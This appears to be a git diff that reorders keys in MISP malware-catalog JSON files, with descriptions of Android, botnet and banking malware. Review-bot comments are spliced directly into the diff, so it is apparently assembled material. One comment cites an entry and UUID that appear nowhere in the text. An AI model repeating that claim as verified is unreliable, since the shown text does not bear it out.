diff --git a/clusters/android.json b/clusters/android.json
index fcdb7ae..93c0517 100644
--- a/clusters/android.json
+++ b/clusters/android.json
@@ -4463,8 +4463,6 @@
 "https://researchcenter.paloaltonetworks.com/2018/04/unit42-henbox-inside-coop/"
 ]
 },
- "uuid": "72c37e24-4ead-11e8-8f08-db3ec8f8db86§",
- "value": "HenBox",
 "related": [
 {
 "dest-uuid": "36ee04f4-a9df-11e8-b92b-d7ddfd3a8896",
@@ -4473,7 +4471,9 @@
 ],
 "type": "similar"
 }
- ]
+ ],
+ "uuid": "72c37e24-4ead-11e8-8f08-db3ec8f8db86§",
+ "value": "HenBox"
 },
 {
 "description": "Cybercriminals are currently developing a new strain of malware targeting Android devices which blends the features of a banking trojan, keylogger, and mobile ransomware.",
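Review bot: The HenBox `uuid` re-added in the second hunk is not a valid UUID — it carries a trailing `§` (`72c37e24-4ead-11e8-8f08-db3ec8f8db86§`), which the key-sort commit preserves from the old side instead of fixing. Any `dest-uuid` elsewhere that points at HenBox with the clean 36-character value will not resolve to this entry, and a format check on the field would reject it; unless the `§` is a rendering artifact of this page, the line should read `"uuid": "72c37e24-4ead-11e8-8f08-db3ec8f8db86",`. Worth grepping the other clusters for both spellings before changing it so no existing relation is silently broken.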
@@ -4496,24 +4496,24 @@
 "value": "Skygofree"
 },
 {
- "value": "BusyGasper",
 "description": "A new family of spyware for Android grabbed the attention of security researchers through its unusual set of features and their original implementation. Tagged BusyGasper by security experts at Kaspersky, the malware stands out through its ability to monitor the various sensors present on the targeted phone. Based on the motion detection logs, it can recognize the opportune time for running and stopping its activity.",
 "meta": {
 "refs": [
 "https://www.bleepingcomputer.com/news/security/unsophisticated-android-spyware-monitors-device-sensors/"
 ]
 },
- "uuid": "1c8e8070-bfe2-11e8-8c3e-7f31c66687a2"
+ "uuid": "1c8e8070-bfe2-11e8-8c3e-7f31c66687a2",
+ "value": "BusyGasper"
 },
 {
- "value": "Triout",
 "description": "Bitdefender says Triout samples they discovered were masquerading in a clone of a legitimate application, but they were unable to discover where this malicious app was being distributed from. The obvious guess would be via third-party Android app stores, or app-sharing forums, popular in some areas of the globe.",
 "meta": {
 "refs": [
 "https://www.bleepingcomputer.com/news/security/new-android-triout-malware-can-record-phone-calls-steal-pictures/"
 ]
 },
- "uuid": "08965226-c8a9-11e8-ad82-b3fe44882268"
+ "uuid": "08965226-c8a9-11e8-ad82-b3fe44882268",
+ "value": "Triout"
 }
 ],
 "version": 14
diff --git a/clusters/backdoor.json b/clusters/backdoor.json
index 60cf8ca..0908426 100644
--- a/clusters/backdoor.json
+++ b/clusters/backdoor.json
@@ -5,7 +5,6 @@
 "description": "A list of backdoor malware.",
 "name": "Backdoor",
 "source": "Open Sources",
- "version": 2,
 "type": "backdoor",
 "uuid": "75436e27-cb57-4f32-bf1d-9636dd78a2bf",
 "values": [
@@ -17,11 +16,10 @@
 "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html"
 ]
 },
- "value": "WellMess",
- "uuid": "e0e79fab-0f1d-4fc2-b424-208cb019a9cd"
+ "uuid": "e0e79fab-0f1d-4fc2-b424-208cb019a9cd",
+ "value": "WellMess"
 },
 {
- "value": "Rosenbridge",
 "description": "The rosenbridge backdoor is a small, non-x86 core embedded alongside the main x86 core in the CPU. It is enabled by a model-specific-register control bit, and then toggled with a launch-instruction. The embedded core is then fed commands, wrapped in a specially formatted x86 instruction. The core executes these commands (which we call the 'deeply embedded instruction set'), bypassing all memory protections and privilege checks.\n\nWhile the backdoor should require kernel level access to activate, it has been observed to be enabled by default on some systems, allowing any unprivileged code to modify the kernel.\n\nThe rosenbridge backdoor is entirely distinct from other publicly known coprocessors on x86 CPUs, such as the Management Engine or Platform Security Processor; it is more deeply embedded than any known coprocessor, having access to not only all of the CPU's memory, but its register file and execution pipeline as well.",
 "meta": {
 "date": "August 2018",
@@ -31,7 +29,9 @@
 "https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Christopher%20Domas/DEFCON-26-Christopher-Domas-GOD-MODE-%20UNLOCKED-hardware-backdoors-in-x86-CPUs.pdf"
 ]
 },
- "uuid": "2bb165dc-9f93-11e8-ae64-d3dbab0dd786"
+ "uuid": "2bb165dc-9f93-11e8-ae64-d3dbab0dd786",
+ "value": "Rosenbridge"
 }
- ]
+ ],
+ "version": 2
 }
diff --git a/clusters/banker.json b/clusters/banker.json
index b3d6120..cbd6854 100644
--- a/clusters/banker.json
+++ b/clusters/banker.json
@@ -830,14 +830,14 @@
 "value": "Kronos"
 },
 {
- "value": "CamuBot",
 "description": "A newly discovered banking Trojan departs from the regular tactics observed by malware researchers by choosing visible installation and by adding social engineering components.\nCamuBot appeared last month in Brazil targeting companies and organizations from the public sector. The victim is the one installing the malware, at the instructions of a human operator that pretends to be a bank employee.",
 "meta": {
 "refs": [
 "https://www.bleepingcomputer.com/news/security/new-banking-trojan-poses-as-a-security-module/ "
 ]
 },
- "uuid": "2fafe8b2-b0db-11e8-a81e-4b62ee50bd87"
+ "uuid": "2fafe8b2-b0db-11e8-a81e-4b62ee50bd87",
+ "value": "CamuBot"
 }
 ],
 "version": 13
diff --git a/clusters/botnet.json b/clusters/botnet.json
index 0b6c4a8..21ce037 100644
--- a/clusters/botnet.json
+++ b/clusters/botnet.json
@@ -842,7 +842,6 @@
 "value": "Bamital"
 },
 {
- "value": "Gafgyt",
 "description": "Linux.Gafgyt is a Trojan horse that opens a back door on the compromised computer and steals information. The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).",
 "meta": {
 "refs": [
@@ -853,10 +852,10 @@
 "Bashlite"
 ]
 },
- "uuid": "40795af6-b721-11e8-9fcb-570c0b384135"
+ "uuid": "40795af6-b721-11e8-9fcb-570c0b384135",
+ "value": "Gafgyt"
 },
 {
- "value": "Sora",
 "description": "Big changes on the IoT malware scene. Security researchers have spotted a version of the Mirai IoT malware that can run on a vast range of architectures, and even on Android devices. This Mirai malware strain is called Sora, a strain that was first spotted at the start of the year.Initial versions were nothing out of the ordinary, and Sora's original author soon moved on to developing the Mirai Owari version, shortly after Sora's creation.",
 "meta": {
 "refs": [
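Review bot: The CamuBot `refs` entry in the banker.json hunk ends with a trailing space inside the string, `".../new-banking-trojan-poses-as-a-security-module/ "`, so the stored value is not the URL as published and will not match the same reference given without the space elsewhere (deduplication, link checks and any consumer that hands the string to an HTTP client as-is will see a different resource). The sort-keys commit moves the surrounding lines but leaves the context line untouched; it should be `"https://www.bleepingcomputer.com/news/security/new-banking-trojan-poses-as-a-security-module/"`. Since the cluster `version` is not bumped here (still `13`), the fix can be folded into whichever change next increments it.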
@@ -889,27 +888,28 @@
 "type": "variant-of"
 }
 ],
- "uuid": "025ab0ce-bffc-11e8-be19-d70ec22c5d56"
+ "uuid": "025ab0ce-bffc-11e8-be19-d70ec22c5d56",
+ "value": "Sora"
 },
 {
- "value": "Torii",
 "description": " we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses. The developers of the botnet seek wide coverage and for this purpose they created binaries for multiple CPU architectures, tailoring the malware for stealth and persistence.",
 "meta": {
 "refs": [
 "https://blog.avast.com/new-torii-botnet-threat-research",
 "https://www.bleepingcomputer.com/news/security/new-iot-botnet-torii-uses-six-methods-for-persistence-has-no-clear-purpose/"
 ]
- }
+ },
+ "value": "Torii"
 },
 {
- "value": "Persirai",
 "description": "A new Internet of Things (IoT) botnet called Persirai (Detected by Trend Micro as ELF_PERSIRAI.A) has been discovered targeting over 1,000 Internet Protocol (IP) Camera models based on various Original Equipment Manufacturer (OEM) products. This development comes on the heels of Mirai—an open-source backdoor malware that caused some of the most notable incidents of 2016 via Distributed Denial-of-Service (DDoS) attacks that compromised IoT devices such as Digital Video Recorders (DVRs) and CCTV cameras—as well as the Hajime botnet.",
 "meta": {
 "refs": [
 "https://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/"
 ]
 },
- "uuid": "e3e91fe2-c7ce-11e8-8e85-6bc15cd2a63c"
+ "uuid": "e3e91fe2-c7ce-11e8-8e85-6bc15cd2a63c",
+ "value": "Persirai"
 }
 ],
 "version": 15
diff --git a/clusters/branded_vulnerability.json b/clusters/branded_vulnerability.json
index f3729e1..72786cb 100644
--- a/clusters/branded_vulnerability.json
+++ b/clusters/branded_vulnerability.json
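Review bot: The Torii entry has no `uuid` at all — on the new side the `meta` object closes with `},` and is followed directly by `"value": "Torii"`, whereas Sora and Persirai in the same hunk both carry one. Without a uuid the entry cannot be the target of a `related`/`dest-uuid` link and anything that keys galaxy values by uuid (sync, dedup, tag resolution) will either skip it or fail; the reorder commit reveals the gap but does not fill it. A freshly generated `"uuid": "<new-uuid>",` belongs between the closing `},` of `meta` and `"value": "Torii"` — do not reuse one from another entry. Separately, the description starts with a leading space and a lower-case fragment (`" we have been observing …"`), which reads as an unattributed quote and would be cleaner as a sentence naming Avast as the source.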
@@ -149,13 +149,13 @@
 "value": "ImageTragick"
 },
 {
+ "description": "Blacknurse is a low bandwidth DDoS attack involving ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016. The earliest samples we have seen supporting this DDoS method are from September 2017.",
 "meta": {
 "logo": [
 "http://blacknurse.dk/____impro/1/onewebmedia/blacknurse2.png?etag=W%2F%2214e7-5761287d%22&sourceContentType=image%2Fpng&ignoreAspectRatio&resize=200%2B200&extract=0%2B40%2B200%2B114"
 ]
 },
 "uuid": "3c2325e4-b740-11e8-9504-b32b4d974add",
- "description": "Blacknurse is a low bandwidth DDoS attack involving ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016. The earliest samples we have seen supporting this DDoS method are from September 2017.",
 "value": "Blacknurse"
 }
 ],
diff --git a/clusters/malpedia.json b/clusters/malpedia.json
index 6b59fe9..4786150 100644
--- a/clusters/malpedia.json
+++ b/clusters/malpedia.json
@@ -1,72 +1,74 @@ { - "description": "Malware galaxy cluster based on Malpedia.", - "type": "malpedia", "authors": [ "Daniel Plohmann", "Steffen Enders", "Andrea Garavaglia", "Davide Arcuri" ], + "description": "Malware galaxy cluster based on Malpedia.", + "name": "Malpedia", + "source": "Malpedia", + "type": "malpedia", + "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e", "values": [ { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine", "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", - "value": "AdultSwine", - "description": "" + "value": "AdultSwine" }, { + "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", "https://github.com/DesignativeDave/androrat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "80447111-8085-40a4-a052-420926091ac6", - "value": "AndroRAT", - "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it." 
+ "value": "AndroRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy", "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/", "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184", - "value": "AnubisSpy", - "description": "" + "value": "AnubisSpy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", - "value": "Bahamut", - "description": "" + "value": "Bahamut" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot", "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", 
@@ -74,47 +76,44 @@ "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "85975621-5126-40cb-8083-55cbfa75121b", - "value": "BankBot", - "description": "" + "value": "BankBot" }, { + "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites", "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", "https://www.youtube.com/watch?v=1LOy0ZyjEOk" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", - "value": "Catelites", - "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. 
After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions." + "value": "Catelites" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger", "http://blog.checkpoint.com/2017/01/24/charger-malware/", "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561", - "value": "Charger", - "description": "" + "value": "Charger" }, { + "description": "", "meta": { - "synonyms": [ - "Pegasus", - "JigglyPuff" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", 
@@ -122,150 +121,153 @@ "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", "https://media.ccc.de/v/33c3-7901-pegasus_internals", "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/" - ] + ], + "synonyms": [ + "Pegasus", + "JigglyPuff" + ], + "type": [] }, "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad", - "value": "Chrysaor", - "description": "" + "value": "Chrysaor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor", "https://twitter.com/LukasStefanko/status/1042297855602503681" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724", - "value": "Clientor", - "description": "" + "value": "Clientor" }, { + "description": "", "meta": { - "synonyms": [ - "SpyBanker" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic", "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/" - ] + ], + "synonyms": [ + "SpyBanker" + ], + "type": [] }, "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", - "value": "Connic", - "description": "" + "value": "Connic" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer", "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", - "value": "Cpuminer", - "description": "" + "value": "Cpuminer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker", "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c", - "value": "DoubleLocker", 
- "description": "" + "value": "DoubleLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy", "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", - "value": "DualToy", - "description": "" + "value": "DualToy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap", "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", - "value": "Dvmap", - "description": "" + "value": "Dvmap" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot", "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd", - "value": "ExoBot", - "description": "" + "value": "ExoBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "" + "value": "FlexiSpy" }, { + "description": "", "meta": { - "synonyms": [ - "gugi" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", "https://twitter.com/LukasStefanko/status/886849558143279104" - ] + ], + "synonyms": [ + "gugi" + ], + "type": [] }, "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f", - "value": "FlexNet", - "description": "" + "value": "FlexNet" }, { + "description": "", 
"meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl", "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", - "value": "GhostCtrl", - "description": "" + "value": "GhostCtrl" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove", "https://www.clearskysec.com/glancelove/", 
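Review bot: The Connic entry in this hunk moves `"synonyms": ["SpyBanker"]` below `refs`, while the file also has a separate entry keyed `apk.spybanker` (its `value` line is cut off at the end of the diff). If that entry's value is also `SpyBanker`, one name now resolves to two different uuids (`93b1c63a-…` via the synonym and `e186384b-…` via the value), which makes tag-to-entry lookup by name ambiguous for MISP and any tooling that merges synonyms into the value index. The reorder does not introduce the overlap, but it is the right moment to either drop the synonym from Connic or add a `related` link between the two entries so the relation is explicit rather than implied by a shared name.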
@@ -273,247 +275,247 @@ "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", "https://www.ci-project.org/blog/2017/3/4/arid-viper" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", - "value": "GlanceLove", - "description": "" + "value": "GlanceLove" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat", "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", - "value": "HeroRAT", - "description": "" + "value": "HeroRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf", - "value": "IRRat", - "description": "" + "value": "IRRat" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat", "https://blog.lookout.com/mobile-threat-jaderat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", - "value": "JadeRAT", - "description": "" + "value": "JadeRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 
"1e1924b5-89cb-408b-bcee-d6aaef7b24e0", - "value": "KevDroid", - "description": "" + "value": "KevDroid" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler", "https://twitter.com/LukasStefanko/status/928262059875213312" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3", - "value": "Koler", - "description": "" + "value": "Koler" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus", "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", - "value": "Lazarus", - "description": "" + "value": "Lazarus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf", "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c", - "value": "Lazarus ELF Backdoor", - "description": "" + "value": "Lazarus ELF Backdoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki", "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f", - "value": "Loki", - "description": "" + "value": "Loki" }, { + "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. 
Note, the network traffic is obfuscated the same way as in Android Bankbot.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", - "value": "LokiBot", - "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot." + "value": "LokiBot" }, { + "description": "", "meta": { - "synonyms": [ - "ExoBot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher", "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", "https://www.clientsidedetection.com/marcher.html", "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html" - ] + ], + "synonyms": [ + "ExoBot" + ], + "type": [] }, "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e", - "value": "Marcher", - "description": "" + "value": "Marcher" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot", "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/", "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", - "value": "MazarBot", - "description": "" + "value": "MazarBot" }, { + "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot", 
"https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde", - "value": "MysteryBot", - "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality." + "value": "MysteryBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat", "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", - "value": "OmniRAT", - "description": "" + "value": "OmniRAT" }, { + "description": "", "meta": { - "synonyms": [ - "Popr-d30" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30", "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/", "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/" - ] + ], + "synonyms": [ + "Popr-d30" + ], + "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" + "value": "X-Agent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", - "value": "Fake Pornhub", - "description": "" + "value": "Fake Pornhub" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir", 
"https://twitter.com/PhysicalDrive0/statuses/798825019316916224" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef", - "value": "Raxir", - "description": "" + "value": "Raxir" }, { + "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2", "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f", - "value": "RedAlert2", - "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates." + "value": "RedAlert2" }, { + "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. 
